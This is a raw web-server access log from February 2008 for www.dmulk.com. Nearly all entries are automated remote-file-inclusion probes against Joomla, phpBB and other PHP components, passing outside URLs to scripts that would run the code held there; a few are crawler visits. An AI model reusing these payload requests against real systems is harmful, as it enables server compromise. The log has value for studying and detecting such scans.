86.109.103.76 - - [26/Feb/2008:11:22:27 -0800] "GET /logs/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:11:22:27 -0800] "GET /logs/access_080120.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.135.109.228 - - [26/Feb/2008:11:23:04 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [26/Feb/2008:11:23:05 -0800] "GET /logs/index.php?pagina=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.213.30 - - [26/Feb/2008:11:24:23 -0800] "GET /minamijewelry/source_images/ HTTP/1.0" 200 2398 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [26/Feb/2008:11:24:24 -0800] "GET /minamijewelry/?M=A HTTP/1.0" 200 2094 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:11:25:07 -0800] "GET /logs/access_080120.log//lazarusgb/admin.php?include_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:11:25:07 -0800] "GET //lazarusgb/admin.php?include_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:11:25:09 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:11:25:33 -0800] "GET /logs/access_080120.log//lazarusgb/admin.php?include_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:11:25:33 -0800] "GET //lazarusgb/admin.php?include_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:11:25:34 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.165.133 - - [26/Feb/2008:11:25:50 -0800] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.165.133 - - [26/Feb/2008:11:25:50 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.165.133 - - [26/Feb/2008:11:25:50 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.165.133 - - [26/Feb/2008:11:25:54 -0800] "GET /logs/access_080211.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.6.213.50 - - [26/Feb/2008:11:27:23 -0800] "GET /logs/access_080211.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.6.213.50 - - [26/Feb/2008:11:27:23 -0800] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.6.213.50 - - [26/Feb/2008:11:27:25 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.4.3 - - [26/Feb/2008:11:27:31 -0800] "GET /logs/access_080120.log//lazarusgb/admin.php?include_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [26/Feb/2008:11:27:31 -0800] "GET //lazarusgb/admin.php?include_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [26/Feb/2008:11:27:31 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.25 - - [26/Feb/2008:11:28:15 -0800] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [26/Feb/2008:11:28:15 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [26/Feb/2008:11:28:19 -0800] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.250.150.73 - - [26/Feb/2008:11:29:15 -0800] "GET /logs/access_080106.log/?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.250.150.73 - - [26/Feb/2008:11:29:16 -0800] "GET /?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 200 3094 "-" "libwww-perl/5.76" "www.dmulk.com"
209.250.150.73 - - [26/Feb/2008:11:29:16 -0800] "GET /logs/?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 200 36259 "-" "libwww-perl/5.76" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:11:29:18 -0800] "GET /logs/include.php?path[docroot]=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:11:29:18 -0800] "GET /include.php?path[docroot]=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
200.6.213.50 - - [26/Feb/2008:11:29:26 -0800] "GET /logs/access.log/index.php?pag=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.6.213.50 - - [26/Feb/2008:11:29:26 -0800] "GET /index.php?pag=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.6.213.50 - - [26/Feb/2008:11:29:27 -0800] "GET /logs/index.php?pag=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.250.150.73 - - [26/Feb/2008:11:29:31 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.195.44.108 - - [26/Feb/2008:11:29:44 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.77 - - [26/Feb/2008:11:29:45 -0800] "GET /logs/access_080118.log HTTP/1.0" 200 561818 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.6.213.50 - - [26/Feb/2008:11:31:15 -0800] "GET /logs/access_080118.log/index.php?pag=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:11:31:18 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:11:31:18 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:11:31:19 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.98.160 - - [26/Feb/2008:11:32:06 -0800] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.98.160 - - [26/Feb/2008:11:32:06 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.98.160 - - [26/Feb/2008:11:32:06 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.165.133 - - [26/Feb/2008:11:32:50 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
83.223.98.160 - - [26/Feb/2008:11:33:17 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.98.160 - - [26/Feb/2008:11:33:46 -0800] "GET /logs/access_080211.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:11:34:12 -0800] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.6.213.50 - - [26/Feb/2008:11:35:09 -0800] "GET /logs/access_080131.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [26/Feb/2008:11:35:23 -0800] "GET /logs/access_080118.log//modules/xfsection/modify.php?dir_module=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [26/Feb/2008:11:35:27 -0800] "GET /logs/access_080118.log//modules/xfsection/modify.php?dir_module=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.203.196.55 - - [26/Feb/2008:11:35:29 -0800] "GET /logs/access.log/include/functions_common.php?gl_root_path=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.203.196.55 - - [26/Feb/2008:11:35:29 -0800] "GET /include/functions_common.php?gl_root_path=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.203.196.55 - - [26/Feb/2008:11:35:30 -0800] "GET /logs/include/functions_common.php?gl_root_path=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.188.66.23 - - [26/Feb/2008:11:35:58 -0800] "GET /logs/access.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [26/Feb/2008:11:35:59 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [26/Feb/2008:11:35:59 -0800] "GET /logs/access.log/administrator/components/com_serverstat/install.serverstat.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [26/Feb/2008:11:35:59 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [26/Feb/2008:11:35:59 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.169.46.98 - - [26/Feb/2008:11:36:00 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
200.54.224.250 - - [26/Feb/2008:11:38:08 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:11:38:09 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:11:38:09 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.234.108.168 - - [26/Feb/2008:11:39:40 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.239.4.4 - - [26/Feb/2008:11:40:09 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.4.4 - - [26/Feb/2008:11:40:10 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.188.66.23 - - [26/Feb/2008:11:41:12 -0800] "GET /logs/access_080211.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [26/Feb/2008:11:41:13 -0800] "GET /logs/access_080211.log/administrator/components/com_serverstat/install.serverstat.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
200.54.224.250 - - [26/Feb/2008:11:42:19 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:11:42:19 -0800] "GET //Neos_Chronos/header.php?base_folder=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:11:42:19 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.89.60 - - [26/Feb/2008:11:43:44 -0800] "GET /logs/access_071228.log/index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.89.60 - - [26/Feb/2008:11:43:53 -0800] "GET /index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.89.60 - - [26/Feb/2008:11:44:01 -0800] "GET /logs/index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:11:44:09 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:11:44:10 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:11:44:10 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:11:44:13 -0800] "GET /logs/access.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:11:44:13 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:11:44:13 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.150.30.41 - - [26/Feb/2008:11:44:17 -0800] "GET /sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.algebramovie.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.216.104 - - [26/Feb/2008:11:44:42 -0800] "GET /logs/access_080131.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:11:44:50 -0800] "GET /logs/access_071116.log//main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:11:44:50 -0800] "GET /logs/access_071116.log//main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:11:44:50 -0800] "GET //main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:11:44:50 -0800] "GET /logs//main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:11:44:53 -0800] "GET //main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [26/Feb/2008:11:44:53 -0800] "GET /logs//main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:11:45:35 -0800] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:11:45:36 -0800] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:11:45:36 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:11:47:07 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.21.45.58 - - [26/Feb/2008:11:47:32 -0800] "GET /!scanftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.21.45.58 - - [26/Feb/2008:11:47:37 -0800] "GET /!scanftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.1.132.59 - - [26/Feb/2008:11:48:12 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.1.132.59 - - [26/Feb/2008:11:48:13 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.1.132.59 - - [26/Feb/2008:11:48:14 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:11:48:46 -0800] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:11:48:46 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:11:48:47 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:11:49:26 -0800] "GET /logs/access_071222.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:11:49:27 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:11:49:27 -0800] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:11:49:45 -0800] "GET /include/functions_common.php?gl_root_path=http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:11:49:45 -0800] "GET /logs/include/functions_common.php?gl_root_path=http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
84.53.83.254 - - [26/Feb/2008:11:49:57 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
84.53.83.254 - - [26/Feb/2008:11:49:58 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.13.141.14 - - [26/Feb/2008:11:51:29 -0800] "GET /logs/access_071224.log//main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.150.14 - - [26/Feb/2008:11:51:40 -0800] "GET / HTTP/1.0" 200 3078 "-" "libwww-perl/5.805" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:11:52:20 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.79.168.42 - - [26/Feb/2008:11:52:47 -0800] "GET /logs/access_071116.log//main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [26/Feb/2008:11:52:47 -0800] "GET //main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [26/Feb/2008:11:52:47 -0800] "GET /logs//main.php?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:11:52:50 -0800] "GET /logs/access_080211.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.47.213.57 - - [26/Feb/2008:11:53:10 -0800] "GET /modules/block_media/util.media.php?GLOBALS[where_cms]=http://www.sportellogiovani.mantova.it/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.47.213.57 - - [26/Feb/2008:11:53:10 -0800] "GET /logs/modules/block_media/util.media.php?GLOBALS[where_cms]=http://www.sportellogiovani.mantova.it/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
219.94.162.186 - - [26/Feb/2008:11:53:16 -0800] "GET /index.php?option=com_joomlaxplorer&task=cat_view&gid=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
